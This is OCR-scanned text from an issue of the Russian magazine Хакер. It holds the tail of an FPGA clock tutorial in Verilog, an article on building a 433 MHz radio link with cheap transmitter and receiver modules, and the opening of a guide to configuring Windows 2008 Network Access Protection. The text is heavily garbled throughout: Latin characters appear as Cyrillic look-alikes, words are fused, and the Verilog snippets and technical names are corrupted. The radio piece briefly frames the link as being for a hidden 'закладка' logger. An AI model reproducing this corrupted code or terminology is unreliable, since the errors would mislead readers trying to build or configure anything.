Квартуса. 

Тамжеописываем связи идля внешнихшин. Кэтимтрем посчитанным 
шинам надо прикрутить второй «ящик», который мы назовем «Мих» (Муль- 
типлексор). Рольэтого модуля — с большой скоростью переключаться меж- 
дуножками микросхемы и поочередно драйвить их. Диодов ведь много, а 
ножеку процессора — мало. Хотя если в твоей плате их будет до ста точно, 
то Мультиплексор может быть упразднен. Мультиплексоруна вход, кроме, 
собственно, чисел, подается еще высокочастотный импульс для быстрого 
переключения на разные шины питания. На каждый импульс высокой час- 
тоты мы поднимаем по очереди разные ноги, драй вящие питание, а также 
выводим ту или иную часть числа на диоды. Наружу из ящика буд^торчать 
девять ног, идущих на моргалки, и две — на включение шин питания. В этом 
и суть мультиплексора. На вход ему — 17 (6+6+5) бит и частота, а на выходе 
— уже 16 ног, из которых шесть — питательные. 

Я для себя на отладочной плате сделал еще 7-сегментный дисплей, 
показывающий время в человеческих цифрах, поэтому мне понадобился 
модуль 5\л/іІ с Ь, преобразующий цифру в байт на дисплее. 

Еще один ящик — счетчиквремени — будет считать такты с припаянного 
к микросхеме кварца и отдавать уже замедленные частоты Главному 
Счетчику и Мультиплексору. В нем будут два регистра, которые при пере- 
полнении поднимают/опускают соответствующую ногу. 

Главный модуль Роіех, описанный внизу исходника, будет связывать 
между собой остальные модули и общаться с внешним миром. 

Как видишь, не касаясь еще Ѵегііод’а, мы уже построили «алгоритм», ко- 
торый даже можно было бы реализовать в железе, просто купив и запаяв 
три микросхемы. В нашем же случае эти «микросхемы» будутжить на 
одном кристалле, а связи между ними будут чисто логическими. 

Н ПРОГРАММИРОВАНИЕ 

Словами тосіиіе и епсі тосі и Іе ограничиваем наш «ящик». Указыва- 
ем входящие и выходящие «пины», а потом указываем на поведение 
регистров при входящем сигнале снаружи (Сіоскі Нт.}. Обрати внимание, 
рядом с каждым регистром указываем его длину в битах ([5:0]), чтобы не 
было путаницы, и чтобы компилятор правильно понял, с какой частью 
регистра работать. Нотация «6’сІ59» обозначает, что число 6-разрядное, 
десятичное (б) и равно 59. 

Привыкшие к «нормальным» языкам программисты спросят, почему 
нельзя написать, например, такой код следующим способом? 



.... (и т. д. ) 

епсі 

Казалось бы, все честно. Мы увеличиваем Регистр Секунд на единицу, и, 
если он равен 60, то обнуляем его и прибавляем Минуты. 

Такбы и написало большинство классических программистов, писавших 
ранее на алгоритмических языках, а ведь это типичная ошибка. Но мы 
ведь пишем параллельную систему! Строка «5есопбз[5:0] <=5есопбз[5:0] 
+ 1'Ы ;» будет выполняться одновременно с «\і (8есопб5[5:0]==6’б60)». 
Другими словами, к одному итомуже регистру мы обращаемся и изменя- 
ем его сразу из двух мест. Шестеренка еще не закончила свой оборот, а 
мы уже узнаем еезначение! Результат получится непредсказуемый. Вот 
чтобы такого не было, и надо изменение регистра на две ветви, с іі и еізе. 
Хотя в нашем случае будем использовать готовую библиотечную мега- 
функцию Іргтщсоипіег, заменяющую сложения и условия более оптими- 
зированной и красиво выглядящей версией. Кроме программирования, 
нам предстоит не менее ответственная часть — расстановка электри- 
ческихтипов ножек микросхемы и привязка их к внутренностям. Звучит 
страшно, но на деле все делается быстро и безболезненно. Сверху ищем 
кнопку Ріп Ріаппег, расставляем драйвящие ноги соответственно их 
назначению, обзываем их переменными связей, «торчащих» из глав- 
ного модуля, указываем ногу, к которой привязан кварц и пытаемся со 
всем этим взлететь. Сохраняемся, выбираем в меню Ргосеззіпд Зіагі 
Сотрііаііоп и ждем окончания сборки, внимательно читая сообщения 
компилятора. Помимо непосредственно сборки проводится еще опти- 
мизация расположения ячееки анализатор времени исполнения. 

Н ПРОШИВКА 

Какяуже говорил, логические ячейки несохраняютсвоего состояния 
при выключении питания, поэтому микросхемы комплектуются внешней 
(в случае Сусіопе) или внутренней (Мах) ЕІазЬ-памятью, в которую и надо 
загрузить прошивку. При каждом включении питания Альтерина быстро 
выкачивает конфигурациюячеекизфлеша и приступает к работе. Скорее 
всего, на твоей отладочной плате уже распаян продвинутый интерфейс 
ЛАС, используемый электронщиками какуниверсальная шина для про- 
верки и прошивки всего и вся на целой плате. Для прошивки Альтерины 
используется программатор ВуІеВІазІегили ВуІеВІазІег II, умеющий шить 
по протоколу ЛАС или АсбѵеЗегіаІ. Схема его легко ищется в инете, а сам 
ВуІеВІазІег, несмотря на громкое название, представляет собой простой 
переходнике порта ЕРТ, состоящий, чаще всего, из кучки резисторов и 
прокачивающий линию буфера-козявки. Можно и купить. 

В Квартус встроен программатор (Тооіз Ргодгаттег). Выбираем там 
режим прошивки, портитыкаем ЗіагЕ При правильном подключении мик- 
росхема запрошьется, и после перезагрузки мы увидим работающие часы. 



аімауз @ (розесіде СІоскІНг) Ьедіп 
Зесопсіз [5 : 0 ] <= Зесопсіз [ 5 : 0 ] + 1'Ы; 

іб (Зесопсіз [5 : 0] ==б ' сібО) Ьедіп 
Зесопсіз [5:0] <=6 ' Ь0 ; 

Міпибез [5:0] <= Міпибез [ 5 : 0 ] + 1'Ы; 

епсі 



Н ЗАКЛЮЧЕНИЕ 

Естественно, в одной статье невозможно описать все нюансы парал- 
лельного программирования. Что-то пришлосьопустить. Но я надеюсь, 
что сподвигтебя кболее глубокому изучению материала. Не стесняйся, 
пиши, интересуйся. ~і~ 
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Когда закладываешь куда-лиі 


бо аппаратный логгер или просто какое-то 



запасло, зачастую требуется 15| Д анных и управление 



устройством. Конечно, никто не запрещает пойти по проторенному пути 



и применить проверенный метод с сотовым телефоном. Но телефон обладает 

I уУі I ІЯ/ 1 1 



ом серьезных недостатков , а зна чит, не всегда подходит. Пора научить тебя 



организовывать собственный радиоканал! 

Я 1 Лл 



1ІК 




г ПРОБЛЕМНЫЕ МОБИЛЫ 

Чем же плох сотовый? Ведьу него и мощный передатчик, и удобство 
управления, и возможность организовать стабильный и устойчивый 
коннект. Фактически, сучетом сотовой сети, — безграничная дальность 
работы! Но, увы, за все приходится платить. Во-первых, самый ком- 
пактный телефон, даже если его как следует о б ко цать — какминимум, 
больше спичечного коробка. Во-вторых, телефон довольно сложен, а с 
увеличением сложности резко падает надежность: тело можетзавис- 
нуть, потерять сеть, заглючить, в конце концов. При работе легко палится 
любыми аудиоустройствами, расположенными в нескольких метрах 
от него. А еще — жрет много, для радиозакладки длительность непре- 
рывной работы в несколько дней — это мизер. Потому-то в некоторых 
случаях использование сотового телефона противопоказано. Впрочем, 
существует та кая милая вещь, какВВМ-модули. Будучи почти полноцен- 



ными сотовыми телефонами, но в микроскопическом корпусе, они ли- 
шены многих описанных недостатков, но довольно сложны восвоении, 
особенно для начинающих. У меня в ящике уже годлежитбез дела один 
такой образчик— размером чуть больше почтовой марки итолщиной в 
три монетки. Если удосужусь с ним разобраться, то выдам тебе мануал, 
какспаять очередной киберпанковский сотовый телефон :). 

Ш КИРПИЧИКИ ТВОЕГО КОНСТРУКТОРА 

Еще каких-то лет пятнадцать назад, чтобы отослать пару десятков байт 
по воздуху, приходилось городить навороченные схемы, не умещающи- 
еся на альбомных листах. Теперьже радиоэлектроника стала немногим 
сложнее конструктора Бедо. А весь секрет в модулях — крошечных 
микроблоках, выполняющих строго определенную функцию и имею- 
щих стандартный интерфейс, например, БАРТ. Взял такой блок, подал 
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другой микроконтроллер, настроил передачу данных — получил полно- 
ценную систему, скажем, радиоуправления. Красота, да и только! Блоков 
разработчики напридумывали на всеслучаижизни.У меня встоле 
только радиопередатчиков валяется несколько разных видов, а есть еще 
ультразвуковые сонары-дальномеры, СЭМ-терминалы, часы реального 
времени, контроллеры клавиатуры, всякие преобразователи сигналов. 
Практически под любую задачу можно подобрать готовое решение, надо 
только поискать. Особо помогает отслеживание новостных лент крупных 
поставщиков радиодеталей — они же их и продают. 

А чтобы ты не запутался в разных спецификациях, я кратко опишутебе 
основные параметры, на которые стоит смотреть. 

Н ИНТЕРФЕЙС 

Какя уже говорил, модули общаются по стандартным интерфейсам. Радио- 
модули — не исключение. Обычно это ЮАРТ или ЭРІ-протокол, реже І2С. ЮАРТ 
— проще и привычнее, зато 5РІ и І2С обладают куда более высокой пропускной 
способностью. Ксчастью, все микроконтроллеры АѴР класса АТтеда, а также 
большинство контроллеров Тіпуподдержива ют всетри протокола аппаратно. 

Я рекомендую для начала выбрать модульс ІІАРТ-интерфейсом. 
Преимущество тут в том, что его можно без особых проблем подключить 
кСОМ-порту компьютера, нужно лишь использовать микросхему преоб- 
разователя уровня напряжений МАХ232 (либо МАХ3232для 3-вольтового 
питания]. А после, подключившись кэтому порту терминалкой, легко 
отследить, что же у тебя там передается радиоканалу. В то время как с І2С 
или 5РІ-модулем утебя будет черный ящик, в который без микроконтрол- 
лера или цифрового осциллографа не заглянешь. 

Также есть модули с «сырым входом». Это своего рода «радио-провод», 
когда утебя на входе уровень сигнала такой же, каки на выходе. Ауж 
какой протокол ты используешь, — делотвое. Как правило, под такую 
передачуданных идеально подходитБАПТ, нотутесть ряд заморочек, о 
которых я расскажу ниже. 

По функциональному назначению передающие девайсы делятся на при- 
емники, передатчики итрансиверы — сочетающие в себе какприемник, 
таки передатчик. 

Н МОДУЛЯЦИЯ И ЧАСТОТА 

Крометипов интерфейса приемо-передатчики различаются типом моду- 
ляции и частотой передачи. 

Типов модуляции есть всего два: амплитудная и частотная. Суть радио- 
передачи в том, что передатчик излучает несущую частоту — синусоиду, а 
приемникее ловит. Если мы меняем высоту синусоиды, то этоамплитуд- 
ная модуляция, а если меняем частоту синусоиды, то, соответственно, 
частотная. Изменения амплитуды или несущей частоты приемник 
воспринимает как полезный сигнал. Например, в случае цифровой 
передачи данных низкая амплитуда — это ноль, высокая — единица. 

Или высокая частота это единица, а низкая ноль. Потипу модуляции 
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5Р1 нктерфейс напоминает кольцо. По командам с тактового импульса байты преемника 
и передатчика начинают побито менягся. через циклически сдвиг Через восемь тактов 
байт приемника и передатчика поменяются местами 



Передача байт по шинеВРІ 



передатчики маркируются какАЭКили Р5К — амплитудная и частот- 
ная, соответственно. А5К проще в реализации и дешевле, поэтому до 
недавнего времени подавляющее большинство передатчиков были на 
амплитудной модуляции. Но по качеству передачи данных амплитуд- 
ная модуляция заметно проигрываетчастотной, — и сейчас ихактивно 
начали теснить Р5К-девайсы. 

Частот существует несколько, обычно это 433МГц — безлицензионная 
любительская частота. Однако встречаются передатчики и на 31 5 или 
868 МГц. Разумеется, приемники передатчикдолжны работать на одной 
частоте и с одним типом модуляции. 

ОТ ТЕОРИИ К ПРАКТИКЕ 

Чтобы не быть голословным, сейчас покажутебе, каксварганить 
простейшее радиоуправление. Будем просто передавать команды от пе- 
редатчика к приемнику. Вообще, тутудобней использовать какой-либо 
трансивер с интерфейсом РІАРТ, который бы сам обрабатывал передачу 
данных, а тебе лишь оставалось слать их в порты. Но это совсем уж прос- 
то, тем более, чаще встречаются в продаже нетрансиверы, а передатчик 
и приемник по отдельности, с «сырым» входом. А при работе с ними есть 
ряд тонкостей, которые бы я хотел осветить, иначе граблей огребешь на 
своем пути не один десяток. 

В качестве подопытных кроликов у меня будут модули НМ-Т433 и НМ- 
Р433 от фирмы НореПР. Который с индексом «Т» — это передатчик, а «В», 
соответственно, приемник. Почему именно они? Во-первых, это Р5К-мо- 
дуль, а значит, помех будет меньше. Во-вторых, у него весьма компакт- 
ные размеры (легко укладывается на пятирублевую монету] и малое 
потребление. А в-третьих, ему не нужна сложная антенна, достаточно 
куска проволоки. В-четвертых, его дальнобойность составляет порядка 
300 метров в поле, и почти 50 метров — в условиях кирпичного здания, 
что длятакой крошки, сантенной из проволоки, весьма неплохо. 
Стоиттакой модуль примерно двести рублей. Мой был куплен и заказан 
доставкой по почте в «Терраэлектронике», но вскоре я нашел его и в 
нашем местном радио-лабазе. 

Н КЛАДЕМ ПАЦИЕНТА НА СТОЛ 

Сам агрегат представляетсобой небольшую платку с выводами и контакт- 
ной дыркой для антенны. В дырку я сразуже впаял проводокдлиной 1 7 
см. Длина выбрана неслучайно — это четверть от длины волны 433МГц 
сигнала. Таким образом, получается стандартная четвертьволновая 
антенна, в которой возникает резонансное колебание, предварительно 
усиливающее сигнал. Теперь обрати внимание на разъемы. Заметь, все 
выводы подписаны прямо на плате и нет нужды лазить в даташит. 

У передатчика три вывода: 

• Ѵсс — плюс напряжения питания . От 3 . 3 до 5 вольт 

• БАТА — вход данных с БАКТ 

• СББ — минус напряжения питания 

У приемника четыре: 

• Ѵсс — плюс напряжения питания . От 3 . 3 до 5 вольт 
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• БАТА — вход данных с БАЕТ 

• СЫБ — минус напряжения питания 

• ЕБАВЬЕ — разрешение приема. Чтобы приемник заработал, 
сюда нужно подать сигнал высокого уровня (логическая 1) , 
или напряжение питания 

Чтобы проверить работу радиоканала, я подключил приемниккСОМ- 
порту компьютера, через переходник на базе МАХ232, а на передатчик 
загнал сигнал с выхода ПХЭ микроконтроллера АТтеда8. Настроил 
ІІАРТ на частоту 9600 бод в секунду и включил терминалку. В качестве 
данных я отправил с микроконтроллера последовательность чисел отО 
до 255 и далее по кругу. В результате, втерминалке по очереди должен 
вылезти весьалфавитплюс все спецсимволы по порядку. 

Послезапуска микроконтроллера я нажал кнопку Соппесі; втерминаль- 
ной программе и подал плюс на вход ЕпаЫе передатчика. О! На выходе 
появилисьсимволы, а если включить график, отображающий число от 
нуля до 255 в виде точки поосиУ.то получается пила — числа-тоу нас 
возрастают отО до 255. 

Н ОСОБЕННОСТИ «СЫРОГО КАНАЛА» 

Когда передатчик включается до приемника, все замечательно и здо- 
рово — байты передаются без искажений, помех не наблюдается — ведь 
приемник цепко ухватился за несущую частоту передатчика и зорко 
следит за ее изменениями. Но что будет, если передатчик пропадет, 
например, выйдет из зоны приема? Выключаю передатчик... ой, какой на 
выходе появился шум! Атеперь представьте ситуацию: захотел прием- 
ник получить инфу, начинает слушать эфир, а ему на вход поток цифрово- 
го дерьма валом валит. Ведь передатчик и приемник — это независимые 
девайсы, работающие каждый по своей программе. Следовательно, пе- 
ред отправкой данных передатчикдолжен дать приемнику понять, что он 
появился в эфире. Начинаем анализировать шумовой сигнал; налицо 
хаотичные байты, причем численно они в районе 100-255. Так что, если 
мы перед отправкой данных пошлем, например, десять байте числом 15, 
то этот островок стабильности будет четко выделяться из окружающего 
хаоса. В программу приема заложим следующий алгоритм: 

А) Игнорируем входящие данные до тех пор, пока не появят- 
ся десять одинаковых байт подряд . После чего все входящие 
байты считаем полезной информацией . 

Б) По окончании данных передатчик обязан выдать заверша- 
ющую последовательность, чтобы приемник четко понял, что 
на этом полезные данные окончены и дальше будет шум. 

Сказано — сделано. Гоним теперь с передатчика в терминал куне числа от 
0 до 255, а вначале 1 0 байт, например, число 1 , а затем полезный сигнал 
— число 2. Смотрим, что получилось... а получиласьлажа! Судя потерми- 
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Сигнал смоделированный по частоте несущего сигнала 



Амплитудная и частотная модуляция 



Как с первого 
взгляда просечь 
интерфейс модуля 

Тебе нужно в первую очередь добраться до описания выводов. А 
дальше — читай обозначения. Если видишь выводы КХ и ТХ или 
КХБ и ТХБ — это ЦАКТ, как пить дать. 

Если 5БАи 5СЬ — однозначно І2С или, как его называет Ашіеі, 

ТѴѴІ. 

Интерфейс 5РІ шифруется под именами ИО, ИІ, 5СК. Впрочем, 
тут надо глядеть в оба! Как только разработчики не называют 
несчастные выводы. Суть в том, что у 5РІ есть ІприЦ Оигриг и Сіоск. 
Наличие сокращений от этих простых слов позволяет легко опре- 
делить тип интерфейса. 

налу, пришли какие-то десять символов, но явно не 1 , а потом пошли одни 
и те же символы, но не2,а муть какая-то. Почему возниксбой?Авседело в 
структуре пакета ІЭАНТ, который ты можешь увидеть на картинке. Видишь, 
что тут стоп байтничем неотличается отобычного байта? Когда нетчеткой 
синхронизации по времени, в сплошном потоке данных невозможно отли- 
чить середину-байта отего конца. Радиоканал у нас обеспечиваеттолько 
передачууровня «высокий» или «низкий», да еще начинается в произволь- 
ный момент времени. Вот и получается, что пол байта на вход ІЭАПТ пришло 
мусора, а со второй половины байта пошел полезный сигнал. В результате 
байты смешались, а дальше пошло все со смещением. Вроде и байт 1 0 штук 
одинаковых прошло, а передача все равно кривая. Проблема решается 
просто — перед подачей десяти байтного пакета опознания и полезного сиг- 
нала нужно выставить вход йАТА в передатчике в высокий уровень, чтобы 
дать приемнику «прожевать» байт мусора и приготовиться к приему. 

Можно, конечно, перед отправкой сигнала взять и поднятьлинию ТХИ в 
1 командой 5ВІ, нотутесть одна засада —ждущий режим передатчика. 
Чтобы нетратитьзря энергию, когда на входе нет данных, эти передат- 
чики через 80 миллисекунд отсутствия изменений на входе ИАТА уходят в 
спячку и отключаются вообще. Поэтому нужно не переборщить с выстав- 
лением единички. Но — есть способ проще! Единичку можно получить 
средствами самого ІІАРТ! Для этого достаточно отправить на выход чис- 
ло 255 раза три. Это число состоит из одних единиц, а значит, на выходе 
ІІАПТ’а будет сплошной высокий уровень, за исключением единичного 
старт-бита, которым можно и пренебречь. И если после первого посыла 
этого числа приемный ІЭАПТ не успокоится, то после второго итретьего 
он точно схватитсинхронизацию и дальше можноуже слать данные. 
Итак, отправка данныху нас будетв четыре этапа: 

А) Посылаем в порт три раза число 255 — это поднимет несущую 
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Отправка подряд нескольких чисел "255” дают гарантию синхронизации - сплошной высокий уровень в линии! 



Формат УАПТ-байта. Как появляется рассогласование 



частоту и даст принимающему ШАКТ'у приготовиться к приему. 
Б) Посылаем 10 раз любой произвольный байт. Чтобы прием- 
ник понял , что идут осмысленные данные . 

В ) Шлем данные . 

Г) Шлем завершающий пакет, дающий понять, что передатчик 
закончил работу. 

В ПОЛУДУПЛЕКСНАЯ РАБОТА 

Хорошо, когда надо гнатьсигнал лишь в одном направлении, но что 
делать, если нужен двусторонний канал? Правильно, придется ставить 
по два передатчика и два приемника. Правда, для данного модуля это не 
самый лучший вариант. Тут лучше применить более дорогие, но менее ге- 
морные в дуплексной работе трансиверы. Например, НМ-ТП433. С ними 
все облегчается в разы. Аестьли им альтернатива? Допустим, у меня их, 
какназло, в ящике не оказалось. ЗатоТ и П моделей НМ433го передат- 
чика попалась целая горсть (это называется «планирование снабжения 
через задницу», — Прим, здравого смысла). Правильно, легких путей мы 
не ищем, поэтому сделаем по-комсомольски — стоя и в гамаке! Поста- 
вим на каждую сторону по связке НМ-Т433+НМ-П433. Туттоже есть одни 
хорошие грабли, на которые можно наступить. Прием ни к будет слышать 
какпередатчикудаленного девайса, таки свой собственный в момент 
передачи ответа. А два передатчика одновременно вообще работать не 
будут — у них несущие забьют друг друга. В этом случае прием будет идти 
в такой последовательности: 

А) Передаем данные сами (если нужно) . 

Б) Ждем более 80 миллисекунд, чтобы наш передатчик ушел в 
спячку и отрубил несущую . 



В) Подачей на ЕпаЫе единички включаем собственный при- 
емник на прослушку эфира . 

Г) Ждем осмысленной последовательности байт в окружающем 
шуме . 

Д) Принимаем данные и финальную посылку, говорящую, что 
передача окончена . 

Е) Выключаем приемник. Эта сторона готова к отправке со- 
общений (если нужно) . 

Как видишь, особых сложностей нет. Надо просто совершить больше 
программных операций — вот цена простоты и дешевизны. Также не поме- 
шает повесить поверх передачи какой-либо протокол обработки ошибок. 
Погугли на предмет«Манчестерского кода» или «кода Рида-Соломона» и 
прочих систем избыточного помехоустойчивого кодирования. Особенно 
рекомендую статью Криса Касперски «Могущество кодов Рида-Соломона, 
или информация, воскресшая из пепла», где все эти методики разъяснены 
буквально на пальцах. Сама статья находится поисковиком мгновенно. 

Н ДЕВАЙС 

Атеперь, чтобы не быть сухим теоретиком, покажу, как идет передача 
данных на конкретном устройстве. В качестве приемника послужит 
НМ-Р433, подключенный через МАХ232 к СОМ -порту. 

А передатчиком будет АТтеда8. Чтобы было четко видно, я при- 
паял проводки прямо к выводам меги и разложил на бумажке. С 
меги гонится пила через ПАРТ, а принимается все программкой 
Тегтіпаі. Прошивающие проводки я отключил, чтобы не маячили. 
Исходники, фаршированные комментариями, и дата шиты, как 
всегда, ищи на диске, т 



ХАКЕР 12 /120/ 08 



► 115 






ИЗУЧАЕМ ВОЗМОЖНОСТИ НОВОЙ ТЕХНОЛОГИИ ЗАЩИТЫ СЕТЕВОГО ДОСТУПА ЫАР 



Ситуация, когда на одной рабочей станции не установлены последние за 



АКЕР.РКО 



Сетевой коп 



УЛЬЯНА СМЕЛАЯ 



платки, на другой не работае^б ^ндмауэ рщ^с^эетье^- а^^^^^с или 
антишпионское ПО, встречается сплошь и рядом. А ведь б езо пасност ь 
всей Сети определяется самым 

тору с клиентскими компьютерами, не удовлетворяющими требованиям 
безопасности? 



НОВАЯ ТЕХНОЛОГИЯ ЫАР 

Технология защиты сетевого доступа ЫАР (Ыеіѵѵогк Ассезз Ргоіесбоп], ре- 
ализованная в ѴѴіп2к8, призвана помочь администратору в поддержании 
безопасности Сети на максимально высоком уровне. Принцип работы ЫАР 
заключается в следующем. При подключении клиента к Сети проверяет- 
ся наличие файрвола, последних обновлений безопасности, обновлений 
антивирусных программ и т.д. Если компьютер не удовлетворяет приня- 
тым политикам, в полном доступе ему будет отказано до тех пор, пока вы- 
явленные проблемы не устранят. В зависимости от настроек, компьютеры, 
не прошедшие контроль, либо блокируются полностью, либо помещаются 
в карантин (например, им выдаются ІР-адреса из другого диапазона). Как 
вариант, можно настроить только журналирование подобных событий без 
принятия каких-либо мер. В карантинной подсети могут располагаться кор- 
рекционные сервера (Ретебіайоп Вегѵег), предоставляющие ресурсы для 



устранения выявленных недостатков, к примеру, сервер обновлений ѴѴ51І5 
(ѴѴіпбомзЗегѵегІІрсІаІюЗегѵісез) или антивирусная база. После обновления 
соответствие политикам проверяется повторно, — если все нормально, сис- 
тема получает доступ в Сеть. Среди настроек можно указать веб-страничку, 
на которой описано, почему пользователь не может подключиться, и что ему 
для этого нужно сделать. Так что, ЫАР выполняет не только блокирующие 
функции, но и является средством, помогающим устранить найденные 
недостатки. Его работа не сводится к однократной проверке при подклю- 
чении (после которой пользователь может отключить антивирус, «чтобы 
не мешал»). Проверка состояния производится периодически в течение 
всего времени, когда компьютер подключен кСети. 

Для некоторых компьютеров (несовместимая ОС; ноутбук посетителя, 
которым управлять не имеем права) может быть настроено исключение, 
позволяющее получить доступ в любом случае. 
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Очень важно понимать, что сам по себе ІЧАР не защищает Сеть и, тем бо- 
лее, не заменяет антивирус и межсетевой экран. Он взаимодействует со 
многими механизмами принуждения (ОНСР, ѴРІМ, ІРзес, ІЕЕЕ 802. 1 х и Т5- 
Оаіеѵѵау] для повышенияуровня безопасности. Собственно, одна иззадач 
администратора при развертывании ЫАР и заключается в вы боре «своего» 
метода. Наиболеепростым и вреализации и по принципудействия являет- 
ся ОНСР, —достаточно перестроитьтаблицу маршрутизации, и клиентуже 
не сможет получить доступ в Сеть. Модифицированная ЫАР-совместимая 
ОНСР-служба называется ОНСР ЫАР Епіюгсетепі Сііепі (ЕС). Остальные 
методы более надежны, хотя потребуют дополнительных настроек. 
Разберем такой вариант. Вся клиентская система в порядке, только не 
активирован брандмауэр. Что проще всего сделать в такой ситуации? 
Блокировать доступ или объяснить пользователю, в чем его проблема? 
Нет. Проще включить ѴѴіпсІоѵѵз Еігеѵѵаіі. Воттут мы подходим к еще одной 
важной особенности ЫАР — клиент-серверной архитектуре. 

Для оценки состояния используется агент ЫАР, либо уже встроенный в 
систему, либо устанавливаемый отдельно. Агент передает отчет о соб- 
людении установленных требований серверу сетевых политик (ІМР5, 
ІМеІѵѵогк Роіісу Зегѵег) отправкой специального ЗНѴ-маркера (Бузует 
Неаііб Ѵаіісіаіогз). І\ІР5-сервер является механизмом обработки политик, 
встроенным вѴѴіп2к8. Он пришел на замену ІпІегпеіАиіЬепІісаІіоп Зегѵісе 
(ІА5), который обеспечивал ПАОШЗ-аутентификацию в Асііѵе Оігесіогу. 
Кроме ѴѴіп2к8, агент уже включен в состав ѴѴіпсІоѵѵз Ѵізіа и ХР 5РЗ. Сам 
агент состоит из нескольких уровней. Это позволяет наращивать его 
возможности. За проверку соответствия заданным требованиям отве- 
чает агент состояния системы (Зузіет Неаііб Адепіз, 5НА). Причем, на 
компьютере может одновременно работать несколько таких агентов. 
Собственный агент Місгозоіі 5НА на основании информации, получен- 
ной из Центра безопасности, проверяет, включен ли брандмауэр, уста- 
новлен ли антивирус и антишпионское ПО. Производители программ 
могут добавлять 5НА для поддержки своих продуктов. Агент карантина 
(Оиагапііпе Адепі, ОА) создает отчеты о состоянии работоспособности 
5НА. И, наконец, клиент принуждения (Епіюгсетепі: Сііепі, ЕС) обеспе- 
чивает доступ к Сети, основываясь на состоянии системы. 

Имеющийся АРІ позволяет третьим сторонам создавать реализации ЕС 
для своих решений, а использование сетевого протокола идентификации 
ІЕЕЕ 802. IX тара нтируетсовместимостьс различны ми вида ми устройств. В 
настоящее время разработан протокол авторизации учетныхданныхузла 
(НозЕ Сгебепііаі Аиібогігаііоп Ргоіюсоі, НСАР), обеспечивающий интегра- 
цию Місгозоіі ІМАРс подобной разработкой Сізсо І\ІАС (ІМеІѵѵогкАсІтіззіоп 
Сопігоі). Активировать поддержку НСАР можно на этапеустановки серве- 
ра ІМР5. Имеются данные о разработках агента Апусііск іюг ЫАР для Мае 
и Ыпих в ІІМЕТзузІет ( ѵѵѵѵѵѵ.ипеізѵзіет.со.кг ). Компания Аѵепсіа [ ѵѵѵѵѵѵ. 
аѵепсіазѵз.сот ] уже представила готовое (правда, не бесплатное) реше- 
ние Аѵепсіа Ыпих ЫАР Адепідля использования в Ыпих. 




Консоль настройки ЫАР-клиента в ѴѴіпсІоѵѵз 2008| 



УСТАНОВКА ЫР5 

Роль І\ІР5, как и большинство остальных ролей, по умолчанию не уста- 
навливается. Выбираем в «Диспетчере сервера» (Зегѵег Мападег] ссылку 
«Добавить роли» (АсИ гоіез], затем в окне выбора ролей отмечаем «Служ- 
бы политики сети и доступа» (ІЧеІѵѵогк Роіісу апсі Ассезз Зегѵісез). Попутно 
не забываем устанавливать остальные роли, которые могут потребовать- 
ся (ОНСР, службы терминалов, ѴРІ\І). В дальнейших настройках будем ис- 
пользовать ОНСР, поэтому отмечаем и роль «ОНСР Зегѵег». 

Переходим к выбору служб ролей (Зеіесі Роіе Зегѵісез). Кроме НСАР, о 
котором говорилось выше, и самого ІЧР5, здесь имеется еще ряд пунктов, 
которые активируем в зависимости от конфигурации. Так, «Центр регис- 
трации работоспособности» (Неаііб Редізігаііоп Аиібогііу, НРА) является 
компонентом ЫАР, обеспечивающим безопасность ІРЗес. Роли НРА и 
НСАР потребуют наличия N5 и ѴѴіпсІоѵѵз РгосеззАсІіѵаІіоп Зегѵісе. Запрос 
на их установку появится на соответствующем шаге. Роль службы мар- 
шрутизации и удаленного доступа (Роиііпд апб Ретоіе Ассезз Зегѵісе, 
РРА5) необходима для клиентов, подключающихся удаленно (Оіаі-ир & 
ѴРІ\І, N АТ) . Вот, собственно, и все. По окончании установки во вкладке 
«Роли»в«Диспетчересервера»появится новый пункт. Также в меню «Ад- 
министрирование» (Асітіпізігаііѵе Тооіз] станет доступна консоль «Сер- 
вер политики Сети» (ІЧеІѵѵогк Роіісу Зегѵег). 



НАСТРОЙКА ЫР5 ПРИ ПОМОЩИ ШАБЛОНА 

Консол ьуправления позволяет настроить ІЧРЗ-сервер несколькими спосо- 
ба ми. Самый простой — вы брать нужную конфигурацию в раскрывающемся 
списке«Стандартная конфигурация» (ЗіапсІагсІ Сопіідигаііоп) назаглавной 
странице. Отсюда можно быстро настроить сервер ЫАР, а также РАСІІЭЗ- 
сервер для удаленного доступа (Оіаі-ир &ѴРІЧ] и ІЕЕЕ802.1х-подключения. 
Кпримеру, выбираем «Защита доступа к Сети» (ІЧеІѵѵогк Ассезз Ргоіесііоп]. 
Послеэтого внизу страницы появится ссылка на документацию. Для начала 
нажимаем на «Настройка ЫАР» (Сопіідиге ЫАР), — стартует мастер конфи- 
гурации. Самый важный шаг — определение в списке «ІЧеІѵѵогк Соппесііоп 
теібосі» метода подключения для ІЧАР-совместимых клиентов. Здесьесть 
все поддерживаемые ЫАР варианты: ОНСР, ІРЗесс НРА, ІЕЕЕ 802. ІхѴѴігеб 
и ѴѴігеІезз, ѴРІ\І и Т5-0аІеѵѵау. Затем в поле «Имя политики» при необхо- 
димости уточняем название правила и переходим к шагу выбора сервера 
принудительной защиты доступа. Главное, не запутаться в терминологии, 
так как просят указать на РА0Ю5 клиента. Обычно это ІЕЕЕ 802. 1х-совмес- 
тимый маршрутизатор или беспроводная точка доступа. 

Если на компьютере, на котором производится установка І\ІР5, выпол- 
няется служба ОНСР, то этот шаг можно пропустить. В Сети может быть 
несколько ОНСР-областей; сервер ІЧРЗ может контролировать их все или 
только некоторые. Шаг «Укажите ОНСР-области» (Зресііу ОНСР Зсорез) 
позволяетопределить области, которые будут контролироваться этим сер- 
вером. Если здесьничего неуказать, политика будет применяться ко всем 
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Настройка политикпри помощи шаблона 




> ѵѵагпіпд 

• Сам по себе ЫАР не 
защищаетСеть и, тем 
более, не заменяет 
антивирус и межсете- 
вой экран. 

• ЫАР не предназна- 
чен для защиты от 
инсайдеров и других 
подобныхтипов внут- 
реннихугроз, когда 
пользователь обла- 
дает в Сети особыми 
правами, позволяю- 
щими выполнять зло- 
намеренные действия 
как умышлен но, так и 
случайно. 



ЫАР-областям. Все добавленные ОНСР-серверы должны 
также поддерживать ЫР5. Теперьуказываем группы пользо- 
вателей и компьютеров, ккоторым будут применяться прави- 
ла. Наследующейстранице«5ресі1 : уа ЫАРРетесІіабопЭгоир 
апб иВІ_» задаем группу серверов обновлений, которые бу- 
дут использоваться клиентами. Если такой группы нет, то ее 
следует создать, нажав кнопку «Новая группа». Чуть ниже, в 
строке «ТгоиЫезНооЕпд II НИ», вводим адрес страницы с инс- 
трукциями для пользователя (если она нужна] и переходим к 
определению политики работоспособности ЫАР (Беііпе ЫАР 
НеаШп роІісу].Установленныйфлажок«Включитьавтообнов- 
